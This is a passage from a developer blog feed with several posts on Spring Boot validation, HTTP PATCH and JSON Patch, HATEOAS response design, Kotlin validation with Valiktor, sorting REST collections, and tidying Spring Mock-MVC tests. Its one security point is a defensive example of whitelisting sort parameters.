private String city;
...
public Address(String street, String city) {
this.street = street;
this.city = city;
ValidationHelper.validate(this);
}
}</pre>
<p>Here the constructor calls a static <span class="code">validate(..)</span> method to validate the object state. This static <span class="code">validate(..)</span> methods looks similar to the previously shown method in <span class="code">ValidationFacade</span>:</p>
<pre class="brush: java">
public class ValidationHelper {
private static final Validator validator = Validation.buildDefaultValidatorFactory().getValidator();
public static <T> void validate(T object, Class<?>... groups) {
Set<ConstraintViolation<T>> violations = validator.validate(object, groups);
if (!violations.isEmpty()) {
throw new ConstraintViolationException(violations);
}
}
}</pre>
<p>The difference here is that we do not retrieve the <span class="code">Validator</span> instance by Spring. Instead, we create it manually by using:</p>
<pre class="brush: java">
Validation.buildDefaultValidatorFactory().getValidator()</pre>
<p>This way we can integrate validation directly into domain objects without relying on someone <em>outside </em>to validate the object.</p>
<h2>Summary</h2>
<p>We saw different ways to deal with validation in Spring Boot applications. Validating incoming request data is good to reject nonsense as early as possible. Persistence layer validation should only be used as additional layer of safety. Method validation can be quite useful, but make sure you understand the limitations. Even if triggering Bean Validation programmatically takes a bit more effort, it is usually the most flexible way.</p>
<p>You can find the source code for the shown examples on <a href="https://github.com/mscharhag/blog-examples/tree/master/spring-validation" target="_blank">GitHub</a>.</p>2021-02-02T22:09:54ZREST: Partial updates with PATCHMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2021-01-13:b1e116a1-f1fc-4255-8732-015cf4b053372021-01-17T20:14:32Z2021-01-17T20:25:26Z<p>In previous posts we learned how to <a href="https://www.mscharhag.com/api-design/updating-resources-put" target="_blank">update/replace resources using the HTTP PUT operation</a>. We also learned about the <a href="https://www.mscharhag.com/api-design/http-post-put-patch" target="_blank">differences between POST, PUT and PATCH</a>. In this post we will now see how to perform partial updates with the HTTP PATCH method.</p>
<p>Before we start, let's quickly check why partial updates can be useful:</p>
<ul>
<li>Simplicity - If a client only wants to update a single field, a partial update request can be simpler to implement.</li>
<li>Bandwidth - If your resource representations are quite large, partial updates can reduce the amount of bandwidth required.</li>
<li>Lost updates - Resource replacements with PUT can be susceptible for the lost update problem. While partial updates do not solve this problem, they can help reducing the number of possible conflicts.</li>
</ul>
<h2>The PATCH HTTP method</h2>
<p>Other like PUT or POST the PATCH method is not part of the original HTTP RFC. It has later been added via <a href="https://tools.ietf.org/html/rfc5789" rel="nofollow" target="_blank">RFC 5789</a>. The PATCH method is neither <a href="https://www.mscharhag.com/api-design/http-idempotent-safe" target="_blank">safe nor idempotent</a>. However, PATCH it is often used in an idempotent way.</p>
<p>A PATCH request can contain one or more requested changes to a resource. If more than one change is requested the server must ensure that all changes are applied atomically. The RFC says:</p>
<blockquote>
<p>The server MUST apply the entire set of changes atomically and never provide ([..]) a partially modified representation. If the entire patch document cannot be successfully applied, then the server MUST NOT apply any of the changes.</p>
</blockquote>
<p>The request body for PATCH is quite flexible. The RFC only says the request body has to contain instructions on how the resource should be modified:</p>
<blockquote>
<p>With PATCH, [..], the enclosed entity contains a set of instructions describing how a resource currently residing on the origin server should be modified to produce a new version. </p>
</blockquote>
<p>This means we do not have to use the same resource representation for PATCH requests as we might use for PUT or GET requests. We can use a completely different Media-Type to describe the resource changes.</p>
<p>PATCH can be used in two common ways which both have their own pros and cons. We will look into both of them in the next sections.</p>
<h2>Using the standard resource representation to send changes (JSON Merge Patch)</h2>
<p>The most intuitive way to use PATCH is to keep the standard resource representation that is used in GET or PUT requests. However, with PATCH we only include the fields that should be changed.</p>
<p>Assume we have a simple <em>product </em>resource. The response of a simple GET request might look like this:</p>
<pre>
GET /products/123
</pre>
<pre>
{
"name": "Cool Gadget",
"description": "It looks very cool",
"price": 4.50,
"dimension": {
"width": 1.3,
"height": 2.52,
"depth": 0.9
}
"tags": ["cool", "cheap", "gadget"]
}</pre>
<p>Now we want to increase the <em>price</em>, remove the <em>cheap </em>tag and update the product <em>width</em>. To accomplish this, we can use the following PATCH request:</p>
<pre>
PATCH /products/123
{
"price": 6.20,
"dimension": {
"width": 1.35
}
"tags": ["cool", "gadget"]
}</pre>
<p>Fields not included in the request should stay unmodified. In order to remove an element from the <em>tags</em> array we have to include all remaining array elements.</p>
<p>This usage of PATCH is called <em>JSON Merge Patch</em> and is defined in <a href="https://tools.ietf.org/html/rfc7396" rel="nofollow" target="_blank">RFC 7396</a>. You can think of a PUT request that only uses a subset of fields. Patching this way makes PATCH requests usually idempotent.</p>
<h2>JSON Merge Patch and null values</h2>
<p>There is one caveat with JSON Merge Patch you should be aware of: The processing of <em>null </em>values.</p>
<p>Assume we want to remove the <em>description </em>of the previously used <em>product </em>resource. The PATCH request looks like this:</p>
<pre>
PATCH /products/123
{
"description": null
}</pre>
<p>To fulfill the client's intent the server has to differentiate between the following situations:</p>
<ul>
<li>The <em>description</em> field is not part of the JSON document. In this case, the description should stay unmodified.</li>
<li>The <em>description </em>field is part of the JSON document and has the value <em>null</em>. Here, the server should remove the current description.</li>
</ul>
<p>Be aware of this differentiation when using JSON libraries that map JSON documents to objects. In strongly typed programming languages like Java it is likely that both cases produce the same result when mapped to a strongly typed object (the <em>description </em>field might result in being <em>null </em>in both cases).</p>
<p>So, when supporting <em>null </em>values, you should make sure you can handle both situations.</p>
<h2>Using a separate Patch format</h2>
<p>As mentioned earlier it is fine to use a different media type for PATCH requests.</p>
<p>Again we want to increase the <em>price</em>, remove the <em>cheap </em>tag and update the product <em>width</em>. A different way to accomplish this, might look like this:</p>
<pre>
PATCH /products/123
{
"$.price": {
"action": "replace",
"newValue": 6.20
},
"$.dimension.width": {
"action": "replace",
"newValue": 1.35
},
"$.tags[?(@ == 'cheap')]": {
"action": "remove"
}
}</pre>
<p>Here we use <a href="https://goessner.net/articles/JsonPath/" rel="nofollow" target="_blank">JSONPath</a> expressions to select the values we want to change. For each selected value we then use a small JSON object to describe the desired action.</p>
<p>To replace simple values this format is quite verbose. However, it also has some advantages, especially when working with arrays. As shown in the example we can remove an array element without sending all remaining array elements. This can be useful when working with large arrays.</p>
<h2>JSON Patch</h2>
<p>A standardized media type to describe changes using JSON is JSON Patch (described in <a href="https://tools.ietf.org/html/rfc6902" target="_blank">RFC 6902</a>). With JSON Patch our request looks this:</p>
<pre>
PATCH /products/123
Content-Type: application/json-patch+json
[
{
"op": "replace",
"path": "/price",
"value": 6.20
},
{
"op": "replace",
"path": "/dimension/width",
"value": 1.35
},
{
"op": "remove",
"path": "/tags/1"
}
]</pre>
<p>This looks a bit similar to our previous solution. JSON Patch uses the <em>op </em>element to describe the desired action. The <em>path </em>element contains a <a href="https://tools.ietf.org/html/rfc6901" rel="nofollow" target="_blank">JSON Pointer</a> (yet another RFC) to select the element to which the change should be applied.</p>
<p>Note that the current version of JSON Patch does not support removing an array element by value. Instead, we have to remove the element using the array index. With <em>/tags/1</em> we can select the second array element.</p>
<p>Before using JSON Patch, you should evaluate if it fulfills your needs and if you are fine with its limitations. In the issues of the GitHub repository <a href="https://github.com/json-patch/json-patch2" rel="nofollow" target="_blank">json-patch2</a> you can find a discussion about a possible revision of JSON Patch.</p>
<p>If you are using XML instead of JSON you should have a look at XML Patch (<a href="https://tools.ietf.org/html/rfc5261" rel="nofollow" target="_blank">RFC 5261</a>) which works similar, but uses XML.</p>
<h2>The Accept-Patch header</h2>
<p>The RFC for HTTP PATCH also defines a new response header for HTTP OPTIONS requests: <em>Accept-Patch</em>. With <em>Accept-Patch</em> the server can communicate which media types are supported by the PATCH operation for a given resource. The RFC says:</p>
<blockquote>
<p>Accept-Patch SHOULD appear in the OPTIONS response for any resource that supports the use of the PATCH method.</p>
</blockquote>
<p>An example HTTP OPTIONS request/response for a resource that supports the PATCH method and uses JSON Patch might look like this:</p>
<p>Request:</p>
<pre>
OPTIONS /products/123</pre>
<p>Response:</p>
<pre>
HTTP/1.1 200 OK
Allow: GET, PUT, POST, OPTIONS, HEAD, DELETE, PATCH
Accept-Patch: application/json-patch+json</pre>
<h2>Responses to HTTP PATCH operations</h2>
<p>The PATCH RFC does not mandate how the response body of a PATCH operation should look. It is fine to return the updated resource. It is also fine to leave the response body empty.</p>
<p>The server responds to HTTP PATCH requests usually with one of the following <a href="https://www.mscharhag.com/api-design/http-status-codes">HTTP status codes</a>:</p>
<ul>
<li>204 (No Content) - Indicates that the operation has been completed successfully and no data is returned</li>
<li>200 (Ok) - The operation has been completed successfully and the response body contains more information (for example the updated resource).</li>
<li>400 (Bad request) - The request body is malformed and cannot be processed.</li>
<li>409 (Conflict) - The request is syntactically valid but cannot be applied to the resource. For example it can be used with JSON Patch if the element selected by a JSON pointer (the <em>path </em>field) does not exist.</li>
</ul>
<h2>Summary</h2>
<p>The PATCH operation is quite flexible and can be used in different ways. <em>JSON Merge Patch</em> uses standard resource representations to perform partial updates. <em>JSON Patch</em> however uses a separate PATCH format to describe the desired changes. it also fine to come up with a custom PATCH format. Resources that support the PATCH operation should return the<em> Accept-Patch</em> header for OPTIONS requests.</p>
<p> </p>2021-01-17T20:25:26ZHATEOAS without linksMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2020-11-26:e8b0c597-a9c9-43af-a06e-212485b610572020-12-01T11:50:13Z2020-12-01T11:50:13Z<p>Yes, I know this title sounds stupid, but could not find something that fits better. So let me explain why I think that links in HATEOAS APIs are not always that useful.</p>
<p>If you don't know what HATEOAS is, I recommend reading my <a href="https://www.mscharhag.com/api-design/hypermedia-rest" target="_blank">Introduction to Hypermedia REST APIs</a> first.</p>
<p>REST APIs with HATEOAS support provide two main features for decoupling client and server:</p>
<ol>
<li>Hypermedia avoids that the client needs to hard-code and construct URIs. This helps the server to evolve the REST-API in the future.</li>
<li>The availability of links tells the client which operations can be performed on a resource. This avoids that server logic needs to be duplicated on the client.<br />
For example, assume the client needs to decide if a payment button should be displayed next to an order. The logic for this might be:
<pre>
if (order.status == OPEN and order.paymentDate == null) {
show payment button
}</pre>
With HATEOAS the client needs not to know this logic. The check simply becomes:
<pre>
if (order.links.getByRel("payment") != null) {
show payment button
}</pre>
The server can now change the rule that decides when an order can be paid without requiring a client update.</li>
</ol>
<p> </p>
<p>How useful these features are depends on your application, your system architecture and your clients.</p>
<p>The second point might not be a big deal for applications that mostly use CRUD operations. However, it can be very useful if your REST API is serving a more complex domain.</p>
<p>The first point depends on your clients and to a certain degree on your overall system architecture. If you provide an API for public clients it is very likely that at least some clients will hard-code request URIs and not use the links you provide. In this case, you loose the ability to evolve your API without breaking (at least some) clients.</p>
<p>If your clients do not use your API responses directly and instead expose their own API it is also unlikely that they will follow the links you return. For example, this can easily happen when using the <a href="https://samnewman.io/patterns/architectural/bff/" rel="nofollow" target="_blank">Backend for Frontend pattern</a>.</p>
<p>Consider the following example system architecture:</p>
<p><a href="https://www.mscharhag.com/files/2020/hateoas-actions-01.png" target="_blank"><img alt="bff-system-architecture" src="https://www.mscharhag.com/files/2020/hateoas-actions-01.png" style="width: 100%; max-width: 500px" /></a></p>
<p>A Backend Service is used by two other systems. Both systems provide user-interfaces which communicate with system specific backends. REST is used for all communication.</p>
<p>Assume a user performs an action using the Android-App (1). The App sends a request to the Mobile-Backend (2). Then, the Mobile-Backend might communicate with the Backend-Service (3) to perform the requested action. The Mobile-Backend can also pre-process, map or aggregate data retrieved from the Backend-Service before sending a response back to the Anroid-App.</p>
<p>Now back to HATEOAS.</p>
<p>If the Backend-Service (3) in this example architecture provides a Hypermedia REST API, clients can barely make use of HATEOAS related links.</p>
<p>Let's look at a sequence diagram showing the system communication to see the problem:</p>
<p><a href="https://www.mscharhag.com/files/2020/hateoas-actions-02.png" target="_blank"><img alt="bff-communication-example" src="https://www.mscharhag.com/files/2020/hateoas-actions-02.png" style="width: 100%; max-width: 820px" /></a></p>
<p>The Backend-Service (3) provides an API-Entrypoint which returns a list of all available operations with their request URIs. The Mobile-Backend (2) sends a request to this API-Entrypoint in regular intervals and caches the link list locally.</p>
<p>Now assume a user of the Android-App (1) wants to access a specific order. To retrieve the required information the Anroid-App sends a request to the Mobile-Backend (2). The URI for this request might have been retrieved from the Mobile-Backends API-Entrypoint previously (not shown).</p>
<p>To retrieve the requested order from the Backend-Service the Mobile-Backend uses the <em>order-details</em> link from the cached link list. The Backend-Service returns a response with HATEOAS links. Here, the <em>order-payment</em> link indicates that the order can be paid. The Mobile-Backend now transforms the response to its own return format and sends it back to the Android-App.</p>
<p>The Mobile-Backend might also return a HATEOAS response. So link URIs from the Backend-Service need to be mapped to the appropriate Mobile-Backend URIs. Therefore the Mobile-Backend checks if an <em>order-payment</em> link is present in the Backend-Service response. If this is the case it adds an <em>order-payment</em> link to its own response.</p>
<p>Note the Mobile-Backend is only using the relations (<em>rel </em>fields) of the Backend-Service response. The URIs are discarded.</p>
<p>Now the user wants to pay the order. The Android-App uses the previously retrieved <em>order-payment</em> link to send a request to the Mobile-Backend. The Mobile-Backend now has lost the Context of the previous Backend-Service response. So it has to look up the <em>order-payment</em> link in the cached link list. The process continues in the same way as the previous request</p>
<p>In this example the Android-App is able to make use of HATEOAS related links. However, the Mobile-Backend cannot use the link URIs returned by Backend-Service responses (except for the API entry-point). If the Mobile-Backend is providing HATEOAS features the link relations from the Backend-Service might be useful. The URIs for Backend-Service requests are always looked up from the cached API-Entrypoint response.</p>
<h2>Communicate actions instead of links</h2>
<p>Unfortunately link construction is not always that simple and can take some extra time. This time is wasted if you know that your clients won't use these links.</p>
<p>Probably the easiest way to avoid logic duplication on the client is to ignore links and use a simple <em>actions </em>array in REST responses:</p>
<pre>
GET /orders/123
{
"id": 123,
"price": "$41.24 USD"
"status": "open",
"paymentDate": null,
"items": [
...
]
"actions": ["order-cancel", "order-payment", "order-update"]
}</pre>
<p>This way we can communicate possible actions without the need of constructing links. In this case the response tells us that the client is able to perform <em>cancel</em>, <em>payment </em>and <em>update</em> operations.</p>
<p>Note that this might not even increase coupling between the client and the server. Clients can still look up URIs for those actions in the API entry point without the need of hard-coding URIs.</p>
<p>An alternative is to use standard link elements and just skip the <em>href </em>attribute:</p>
<pre>
GET /orders/123
{
"id": 123,
"price": "$41.24 USD"
"status": "open",
"paymentDate": null,
"items": [
...
]
"links": [
{ "rel": "order-cancel" },
{ "rel": "order-payment" },
{ "rel": "order-update" },
]
}</pre>
<p>However, it might be a bit confusing to return a <em>links </em>element without links URIs.</p>
<p>Obviously, you are leaving the standard path with both described ways. On the other side, if you don't need links you probably don't want to use a standardized HATEOAS response format (like <a href="http://stateless.co/hal_specification.html" rel="nofollow" target="_blank">HAL</a>) either.</p>
<p> </p>2020-12-01T11:50:13ZValidation in Kotlin: ValiktorMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2020-11-17:6d928190-dbd2-45ea-81f2-e2efa28e9fc12020-11-19T11:42:51Z2020-11-19T11:42:56Z<p><a href="https://beanvalidation.org/" rel="nofollow" target="_blank">Bean Validation</a> is the Java standard for validation and can be used in Kotlin as well. However, there are also two popular alternative libraries for validation available in Kotlin: <a href="https://github.com/konform-kt/konform" rel="nofollow" target="_blank">Konform</a> and <a href="https://github.com/valiktor/valiktor" rel="nofollow" target="_blank">Valiktor</a>. Both implement validation in a more kotlin-like way without annotations. In this post we will look at Valiktor.</p>
<h2>Getting started with Valiktor</h2>
<p>First we need to add the Valiktor dependency to our project.</p>
<p>For Maven:</p>
<pre class="brush: xml">
<dependency>
<groupId>org.valiktor</groupId>
<artifactId>valiktor-core</artifactId>
<version>0.12.0</version>
</dependency></pre>
<p>For Gradle:</p>
<pre class="brush: xml">
implementation 'org.valiktor:valiktor-core:0.12.0'</pre>
<p>Now let's look at a simple example:</p>
<pre class="brush: java">
class Article(val title: String, val text: String) {
init {
validate(this) {
validate(Article::text).hasSize(min = 10, max = 10000)
validate(Article::title).isNotBlank()
}
}
}</pre>
<p>Within the init block we call the <span class="code">validate(..)</span> function to validate the <span class="code">Article</span> object. <span class="code">validate(..)</span> accepts two parameters: The object that should be validated and a validation function. In the validation function we define validation constraints for the <span class="code">Article</span> class.</p>
<p>Now we try to create an invalid <span class="code">Article</span> object with:</p>
<pre class="brush: java">
Article(title = "", text = "some article text")
</pre>
<p>This causes a <span class="code">ConstraintViolationException</span> to be thrown because the <span class="code">title</span> field is not allowed to be empty.</p>
<h2>More validation constraints</h2>
<p>Let's look at a few more example validation rules:</p>
<pre class="brush: java">
validate(this) {
// Multiple constraints can be chained
validate(Article::authorEmail)
.isNotBlank()
.isEmail()
.endsWith("@cool-blog.com")
// Nested validation
// Checks that Article.category.name is not blank
validate(Article::category).validate {
validate(Category::name).isNotBlank()
}
// Collection validation
// Checks that no Keyword in the keywords collection has a blank name
validate(Article::keywords).validateForEach {
validate(Keyword::name).isNotBlank()
}
// Conditional validation
// if the article is published the permalink field cannot be blank
if (isPublished) {
validate(Article::permalink).isNotBlank()
}
}</pre>
<h2>Validating objects from outside</h2>
<p>In the previous examples the validation constraints are implemented within the objects <span class="code">init</span> block. However, it is also possible to perform the validation outside the class.</p>
<p>For example:</p>
<pre class="brush: java">
val person = Person(name = "")
validate(person) {
validate(Person::name).isNotBlank()
}</pre>
<p>This validates the previously created <span class="code">Person</span> object and causes a <span class="code">ConstraintViolationException</span> to be thrown (because <span class="code">name</span> is empty)</p>
<h2>Creating a custom validation constraint</h2>
<p>To define our own validation methods we need two things: An implementation of the <span class="code">Constraint</span> interface and an extension method. The following snippet shows an example validation method to make sure an <span class="code">Interable<T></span> does not contain duplicate elements:</p>
<pre class="brush: java">
object NoDuplicates : Constraint
fun <E, T> Validator<E>.Property<Iterable<T>?>.hasNoDuplicates()
= this.validate(NoDuplicates) { iterable: Iterable<T>? ->
if (iterable == null) {
return@validate true
}
val list = iterable.toList()
val set = list.toSet()
set.size == list.size
}</pre>
<p>This adds a method named <span class="code">hasNoDuplicates()</span> to <span class="code">Validator<E>.Property<Iterable<T>?></span>. So this method can be called for fields of type <span class="code">Iterable<T></span>. The extension method is implemented by calling <span class="code">validate(..)</span> with our <span class="code">Constraint</span> and passing a validation function.</p>
<p>In the validation function we implement the actual validation. In this example we simply convert the <span class="code">Iterable</span> to a <span class="code">List</span> and then the <span class="code">List</span> to a <span class="code">Set</span>. If duplicate elements are present both collections have a different size (a <span class="code">Set</span> does not contain duplicate elements).</p>
<p>We can now use our <span class="code">hasNoDuplicates()</span> validation method like this:</p>
<pre class="brush: java">
class Article(val keywords: List<Keyword>) {
init {
validate(this) {
validate(Article::keywords).hasNoDuplicates()
}
}
}</pre>
<h2>Conclusion</h2>
<p>Valiktor is an interesting alternative for validation in Kotlin. It provides a fluent DSL to define validation rules. Thoes rules are defined in standard Kotlin code (and not via annotations) which makes it easy to add conditional logic. Valiktor comes with many predefined validation constraints. Custom constraints easily be implemented using extension functions.</p>
<p> </p>2020-11-19T11:42:56ZREST: Sorting collectionsMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2020-11-05:a34d40f6-347f-4c06-b511-9116d4385f552020-11-06T11:24:46Z2020-11-06T11:24:52Z<p>When building a RESTful API we often want to give consumers the option to order collections in a specific way (e.g. ordering <em>users</em> by <em>last name</em>). If our API supports <a href="https://www.mscharhag.com/api-design/rest-pagination" target="_blank">pagination</a> this can be quite an important feature. When clients only query a specific part of a collection they are unable to order elements on the client.</p>
<p>Sorting is typically implemented via Query-Parameters. In the next section we look into common ways to sort collections and a few things we should consider.</p>
<h2>Sorting by single fields</h2>
<p>The easiest way is to allow sorting only by a single field. In this case, we just have to add two query parameters for the field and the sort direction to the request URI.</p>
<p>For example, we can sort a list of products by price using:</p>
<pre>
GET /products?sort=price&order=asc</pre>
<p><em>asc</em> and <em>desc</em> are usually used to indicate ascending and descending ordering.</p>
<p>We can reduce this to a single parameter by separating both values with a delimiter. For example:</p>
<pre>
GET /products?sort=price:asc</pre>
<p>As we see in the next section, this makes it easier for us to support sorting by more than one field.</p>
<h2>Sorting by multiple fields</h2>
<p>To support sorting by multiple fields we can simply use the previous one-parameter way and separate fields by another delimiter. For example:</p>
<pre>
GET /products?sort=price:asc,name:desc</pre>
<p>It is also possible to use the same parameter multiple times:</p>
<pre>
GET /products?sort=price:asc&sort=name:desc</pre>
<p>Note that using the same parameter multiple times is not exactly described in the HTTP RFC. However, it is supported by most web frameworks (see this <a href="https://stackoverflow.com/questions/24059773/correct-way-to-pass-multiple-values-for-same-parameter-name-in-get-request" rel="nofollow" target="_blank">discussion on Stackoverflow</a>).</p>
<h2>Checking sort parameters against a white list</h2>
<p>Sort parameters should always be checked against a white list of sortable fields. If we pass sort parameters unchecked to the database, attackers can come up with requests like this:</p>
<pre>
GET /users?sort=password:asc</pre>
<p>Yes, this would possibly not be a real issue if passwords are correctly hashed. However, I think you get the point. Even if the response does not contain the field we use for ordering, the simple order of collection elements could lead to unintended <a href="https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure" rel="nofollow" target="_blank">data exposure</a>.</p>
<p> </p>2020-11-06T11:24:52ZImproving Spring Mock-MVC testsMichael Scharhaghttps://www.mscharhag.comtag:mscharhag.com,2020-10-30:e53ae8c7-bd1e-4a37-bc2b-c98fb060864a2020-11-02T11:25:57Z2020-11-02T11:25:57Z<p><a href="https://docs.spring.io/spring-framework/docs/current/reference/html/testing.html#spring-mvc-test-framework" rel="nofollow">Spring Mock-MVC</a> can be a great way to test Spring Boot REST APIs. Mock-MVC allows us to test Spring-MVC request handling without running a real server.</p>
<p>I used Mock-MVC tests in various projects and in my experience they often become quite verbose. This doesn't have to be bad. However, it often results in copy/pasting code snippets around in test classes. In this post we will look at a couple of ways to clean up Spring Mock-MVC tests.</p>
<h2>Decide what to test with Mock-MVC</h2>
<p>The first question we need to ask is what we want to test with Mock-MVC. Some example test scenarios are:</p>
<ul>
<li>Testing only the web layer and mocking all controller dependencies.</li>
<li>Testing the web layer with domain logic and mocked third party dependencies like Databases or message queues.</li>
<li>Testing the complete path from web to database by replacing third party dependencies with embedded alternatives if possible (e.g. <a href="https://www.h2database.com/html/main.html" rel="nofollow" target="_blank">H2</a> or <a href="https://github.com/embeddedkafka/embedded-kafka" rel="nofollow" target="_blank">embedded-Kafka</a>)</li>
</ul>
<p>All these scenarios have their own up- and downsides. However, I think there are two simple rules we should follow:</p>
<ul>
<li>Test as much in standard JUnit tests (without Spring) as possible. This improves test performance a lot and makes tests often easier to write.</li>
<li>Pick the scenario(s) you want to test with Spring and be consistent in the dependencies you mock. This makes tests easier to understand and can speed them up as well. When running many different test configurations, Spring often has to re-initialize the application context which slows tests down.</li>
</ul>
<p>When using standard JUnit tests as much as possible the last scenario mentioned above is often a good fit. After we tested all logic with fast unit tests, we can use a few Mock-MVC tests to verify that all pieces work together, from controller to database.</p>
<h2>Cleaning up test configuration using custom annotations</h2>
<p>Spring allows us to <a href="https://www.mscharhag.com/spring/annotation-composition" target="_blank">compose multiple Spring annotations</a> to a single custom annotation.</p>
<p>For example, we can create a custom <span class="code">@MockMvcTest</span> annotation:</p>
<pre class="brush: java">
@SpringBootTest
@TestPropertySource(locations = "classpath:test.properties")
@AutoConfigureMockMvc(secure = false)
@Retention(RetentionPolicy.RUNTIME)
public @interface MockMvcTest {}</pre>
<p>Our test now only needs a single annotation:</p>
<pre class="brush: java">
@MockMvcTest
public class MyTest {
...
}</pre>
<p>This way we can clean up tests from various annotations. This is also useful to standardize Spring configuration for our test scenarios.</p>
<h2>Improving Mock-MVC requests</h2>
<p>Let's look at the following example Mock-MVC request and see how we can improve it:</p>
<pre class="brush: java">
mockMvc.perform(put("/products/42")
.contentType(MediaType.APPLICATION_JSON)
.accept(MediaType.APPLICATION_JSON)
.content("{\"name\": \"Cool Gadget\", \"description\": \"Looks cool\"}")
.header("Authorization", getBasicAuthHeader("John", "secr3t")))
.andExpect(status().isOk());</pre>
<p>This sends a PUT request with some JSON data and an <span class="code">Authorization</span> header to <em>/products/42</em>.</p>
<p>The first thing that catches someone's eye is the JSON snippet within a Java string. This is obviously a problem as the double quote escaping required by Java strings makes it barely readable.</p>
<p>Typically we should use an object that is then converted to JSON. Before we look into this approach, it is worth to mention Text blocks. <a href="https://www.mscharhag.com/java/text-blocks" target="_blank">Java Text blocks</a> have been introduced in JDK 13 / 14 as preview feature. Text blocks are strings that span over multiple lines and require no double quote escaping.</p>
<p>With text block we can format inline JSON in a prettier way. For example:</p>
<pre class="brush: java">
mvc.perform(put("/products/42")
.contentType(MediaType.APPLICATION_JSON)
.accept(MediaType.APPLICATION_JSON)
.content("""
{
"name": "Cool Gadget",
"description": "Looks cool"
}
""")
.header("Authorization", getBasicAuthHeader("John", "secr3t")))
.andExpect(status().isOk()); </pre>
<p>In certain situations this can be useful.</p>
<p>However, we should still prefer objects that are converted to JSON instead of manually writing and maintaining JSON strings.</p>
<p>For example:</p>
<pre class="brush: java">
Product product = new Product("Cool Gadget", "Looks cool");
mvc.perform(put("/products/42")
.contentType(MediaType.APPLICATION_JSON)
.accept(MediaType.APPLICATION_JSON)
.content(objectToJson(product))
.header("Authorization", getBasicAuthHeader("John", "secr3t")))
.andExpect(status().isOk());
</pre>
<p>Here we create a product object and convert it to JSON with a small <span class="code">objectToJson(..)</span> helper method. This helps a bit. Nevertheless, we can do better.</p>
<p>Our request contains a lot of elements that can be grouped together. When building a JSON REST-API it is likely that we often have to send similar PUT request. Therefore, we create a small static shortcut method:</p>
<pre class="brush: java">
public static MockHttpServletRequestBuilder putJson(String uri, Object body) {
try {
String json = new ObjectMapper().writeValueAsString(body);
return put(uri)
.contentType(MediaType.APPLICATION_JSON)
.accept(MediaType.APPLICATION_JSON)
.content(json);
} catch (JsonProcessingException e) {
throw new RuntimeException(e);
}
}</pre>
<p>This method converts the <span class="code">body</span> parameter to JSON using a Jackson <span class="code">ObjectMapper</span>. It then creates a PUT request and sets <span class="code">Accept</span> and <span class="code">Content-Type</span> headers.</p>
<p>This reusable method simplifies our test request a lot:</p>
<pre class="brush: java">
Product product = new Product("Cool Gadget", "Looks cool");
mvc.perform(putJson("/products/42", product)
.header("Authorization", getBasicAuthHeader("John", "secr3t")))
.andExpect(status().isOk())</pre>
<p>The nice thing here is that we do not lose flexibility. Our <span class="code">putJson(..)</span> method returns a <span class="code">MockHttpServletRequestBuilder</span>. This allows us to add additional request properties within tests if required (like the <span class="code">Authorization</span> header in this example).</p>
<p>Authentication headers are another topic we often have to deal with when writing Spring Mock-MVC tests. However, we should not add authentication headers to our previous <span class="code">putJson(..)</span> method. Even if all PUT requests require authentication we stay more flexible if we deal with authentication in a different way.</p>
<p><span class="code">RequestPostProcessor</span>s can help us with this. As the name suggests, <span class="code">RequestPostProcessor</span>s can be used to process the request. We can use this to add custom headers or other information to the request.</p>
<p>For example:</p>
<pre class="brush: java">
public static RequestPostProcessor authentication() {
return request -> {
request.addHeader("Authorization", getBasicAuthHeader("John", "secr3t"));
return request;
};
} </pre>
<p>The <span class="code">authentication()</span> method returns a <span class="code">RequestPostProcessor</span> which adds Basic-Authentication to the request. We can apply this <span class="code">RequestPostProcessor</span> in our test using the <span class="code">with(..)</span> method:</p>
<pre class="brush: java">
Product product = new Product("Cool Gadget", "Looks cool");
mvc.perform(putJson("/products/42", product).with(authentication()))
.andExpect(status().isOk())</pre>
<p>This does not only simplify our test request. If we change the request header format we now only need to modify a single method to fix the tests. Additionally <span class="code">putJson(url, data).with(authentication())</span> is also quite expressive to read.</p>
<h2>Improving response verification</h2>
<p>Now let's see how we can improve response verification.</p>
<p>We start with the following example:</p>
<pre class="brush: java">
mvc.perform(get("/products/42"))
.andExpect(status().isOk())
.andExpect(header().string("Cache-Control", "no-cache"))
.andExpect(jsonPath("$.name").value("Cool Gadget"))
.andExpect(jsonPath("$.description").value("Looks cool"));</pre>
<p>Here we check the HTTP status code, make sure the <span class="code">Cache-Control</span> header is set to <span class="code">no-cache</span> and use JSON-Path expressions to verify the response payload.</p>
<p>The <span class="code">Cache-Control</span> header looks like something we probably need to check for multiple responses. In this case, it can be a good idea to come up with a small shortcut method:</p>
<pre class="brush: java">
public ResultMatcher noCacheHeader() {
return header().string("Cache-Control", "no-cache");
}</pre>
<p>We can now apply the check by passing <span class="code">noCacheHeader()</span> to <span class="code">andExpect(..)</span>:</p>
<pre class="brush: java">
mvc.perform(get("/products/42"))
.andExpect(status().isOk())
.andExpect(noCacheHeader())
.andExpect(jsonPath("$.name").value("Cool Gadget"))
.andExpect(jsonPath("$.description").value("Looks cool"));
</pre>
<p>The same approach can be used to verify the response body.</p>
<p>For example we can create a small <span class="code">product(..)</span> method that compares the response JSON with a given <span class="code">Product</span> object:</p>
<pre class="brush: java">
public static ResultMatcher product(String prefix, Product product) {
return ResultMatcher.matchAll(
jsonPath(prefix + ".name").value(product.getName()),
jsonPath(prefix + ".description").value(product.getDescription())
);
}</pre>
<p>Our test now looks like this:</p>
<pre class="brush: java">
Product product = new Product("Cool Gadget", "Looks cool");
mvc.perform(get("/products/42"))
.andExpect(status().isOk())
.andExpect(noCacheHeader())
.andExpect(product("$", product));</pre>
<p>Note that the <span class="code">prefix</span> parameter gives us flexibility. The object we want to check might not always be located at the JSON root level of the response.</p>
<p>Assume a request might return a collection of products. We can then use the <span class="code">prefix</span> parameter to select each product in the collection. For example:</p>
<pre class="brush: java">
Product product0 = ..
Product product1 = ..
mvc.perform(get("/products"))
.andExpect(status().isOk())
.andExpect(product("$[0]", product0))
.andExpect(product("$[1]", product1));
</pre>
<p>With <span class="code">ResultMatcher</span> methods you avoid scattering the exact response data structure over many tests. This again supports refactorings.</p>
<h2>Summary</h2>
<p>We looked into a few ways to reduce verbosity in Spring Mock-MVC tests. Before we even start writing Mock-MVC tests we should decide what we want to test and what parts of the application should be replaced with mocks. Often it is a good idea to test as much as possible with standard unit tests (without Spring and Mock-MVC).</p>
